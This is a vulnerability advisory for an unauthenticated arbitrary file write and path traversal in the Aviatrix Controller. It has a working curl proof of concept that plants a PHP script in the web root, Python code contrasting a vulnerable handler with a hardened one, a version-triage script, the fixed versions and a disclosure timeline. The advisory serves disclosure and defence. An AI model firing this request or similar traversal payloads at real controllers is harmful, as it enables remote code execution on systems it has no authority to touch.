Unrestricted upload of file with dangerous type in Aviatrix allows an unauthenticated user to execute arbitrary code
While the Aviatrix Controller UI requires authentication, many of the backend API calls it relies on do not enforce an authentication check. Some of these calls take a caller-supplied name that is used, without sanitisation, to build a filesystem path, so an unauthenticated attacker can write arbitrary files, including
.php scripts, to locations such as the web root. Scripts written there are executed by the PHP web frontend when requested, allowing an attacker to run code of their choosing on the controller.
Proof of concept
Make the following request to the Aviatrix Cloud Controller. CID normally carries the session identifier issued at login; the request succeeds with a bogus value (x), which is the missing authentication check. account_name carries the path-traversal sequence that steers the write into the web root, and data is the content that is written to the file.
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'
Then browse to https://aviatrix.domain.tld/v1/test. The response will show the PHP version page produced by phpinfo(), confirming that the uploaded script was executed by the web frontend.
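The following Python is an added illustration of the defect the proof of concept exploits, beside a hardened replacement. It is not Aviatrix's code (the controller's backend is not reproduced here): the handler name, the directory layout, the ".sel" suffix and the allowlist are assumptions. The payload is the shape of the PoC's account_name, made relative so the demonstration stays inside a temporary directory instead of writing to /var/www.

```python
import os
import re
import tempfile

# Added illustration, not Aviatrix code: a stand-in for a backend handler that
# stores per-account data at a path built from the caller-supplied account_name.
# Directory layout, the ".sel" suffix and the function names are assumptions.

SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")

# Payload shape from the advisory's PoC, made relative so the demo stays in a temp dir.
POC_ACCOUNT_NAME = "../../../www/php/test.php"
POC_DATA = "hello<?php phpinfo()?>"


def vulnerable_write(base_dir, account_name, data):
    """Joins the untrusted name straight into the path: '../' walks out of base_dir."""
    path = os.path.join(base_dir, account_name)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(data)
    return os.path.realpath(path)


def hardened_write(base_dir, account_name, data):
    """Allowlists the name, fixes the extension, and checks the resolved path stays in base_dir."""
    if not SAFE_NAME.fullmatch(account_name):
        raise ValueError("account_name contains disallowed characters")
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, account_name + ".sel"))
    # Belt and braces: even if the allowlist were loosened, refuse anything outside base.
    if os.path.commonpath([base, path]) != base:
        raise ValueError("resolved path escapes base directory")
    os.makedirs(base, exist_ok=True)
    with open(path, "w") as fh:
        fh.write(data)
    return path


def escapes(base_dir, path):
    """True when path resolves outside base_dir."""
    base = os.path.realpath(base_dir)
    return os.path.commonpath([base, os.path.realpath(path)]) != base


def run_demo():
    """Run the PoC payload through both handlers inside a fresh temp directory."""
    root = tempfile.mkdtemp(prefix="aviatrix-demo-")
    base_dir = os.path.join(root, "data", "metrics", "accounts")
    os.makedirs(base_dir)

    written = vulnerable_write(base_dir, POC_ACCOUNT_NAME, POC_DATA)
    with open(written) as fh:
        content = fh.read()

    try:
        hardened_write(base_dir, POC_ACCOUNT_NAME, POC_DATA)
        hardened_rejected = False
    except ValueError:
        hardened_rejected = True

    legit = hardened_write(base_dir, "prod-account", "gw-1,gw-2")

    return {
        "vulnerable_path": written,
        "vulnerable_escaped": escapes(base_dir, written),
        "vulnerable_content": content,
        "hardened_rejected": hardened_rejected,
        "legit_escaped": escapes(base_dir, legit),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The vulnerable handler lands the PoC content in a www/php/test.php file three levels above its data directory; the hardened one rejects the same name on the allowlist and, independently, on the realpath containment check, while a plain account name is still stored under the intended directory. Fixing the extension server-side matters as much as the containment check: it stops a name that passes the allowlist from becoming a .php file even inside the data directory.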
Fix
Upgrade to one of the following versions:
UserConnect-6.2-1804.2043 or later
UserConnect-6.3-1804.2490 or later
UserConnect-6.4-1804.2838 or later
UserConnect-6.5-1804.1922 or later
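The fixed build numbers above are only meaningful within their own release train: 6.5's fixed build (1804.1922) is numerically lower than 6.4's (1804.2838), so a single global threshold would misclassify hosts. The following Python is an added example of triaging an inventory against this list; it is not an Aviatrix tool, assumes the UserConnect-<major>.<minor>-<build> format shown above, assumes build numbers increase monotonically within a train, and reports trains the advisory does not mention as unknown rather than guessing.

```python
import re

# Added illustration, not an Aviatrix tool. Minimum fixed build per release
# train, copied from the advisory's upgrade list.
FIXED_BUILDS = {
    (6, 2): (1804, 2043),
    (6, 3): (1804, 2490),
    (6, 4): (1804, 2838),
    (6, 5): (1804, 1922),
}

# Assumed format: UserConnect-<major>.<minor>-<build_hi>.<build_lo>
VERSION_RE = re.compile(r"UserConnect-(\d+)\.(\d+)-(\d+)\.(\d+)")


def parse_version(version):
    """Split 'UserConnect-6.5-1804.1922' into a train (6, 5) and a build (1804, 1922)."""
    m = VERSION_RE.fullmatch(version.strip())
    if m is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, build_hi, build_lo = (int(g) for g in m.groups())
    return (major, minor), (build_hi, build_lo)


def is_fixed(version):
    """True/False for trains the advisory covers; None for trains it does not mention.

    Builds are compared only within a train (assumes builds increase within a train);
    comparing 6.5's 1804.1922 against 6.4's 1804.2838 would give the wrong answer.
    """
    train, build = parse_version(version)
    fixed = FIXED_BUILDS.get(train)
    if fixed is None:
        return None
    return build >= fixed


def triage(versions):
    """Map each version string to 'fixed', 'vulnerable' or 'unknown'."""
    labels = {True: "fixed", False: "vulnerable", None: "unknown"}
    return {v: labels[is_fixed(v)] for v in versions}


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample = [
        "UserConnect-6.5-1804.1922",
        "UserConnect-6.5-1804.1900",
        "UserConnect-6.4-1804.2838",
        "UserConnect-6.2-1804.2000",
        "UserConnect-6.1-1804.1000",
    ]
    for version, verdict in triage(sample).items():
        print(f"{version}: {verdict}")
```

Hosts reported as unknown (trains outside 6.2 to 6.5) should be checked against the vendor's own guidance rather than assumed safe.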
Timeline
2021-08-24: Reported to Aviatrix security team
2021-08-26: Aviatrix security team confirms the vulnerability will be fixed in a forthcoming release
2021-09-11: Fix released
2021-09-12: CVE requested
2021-09-13: CVE allocated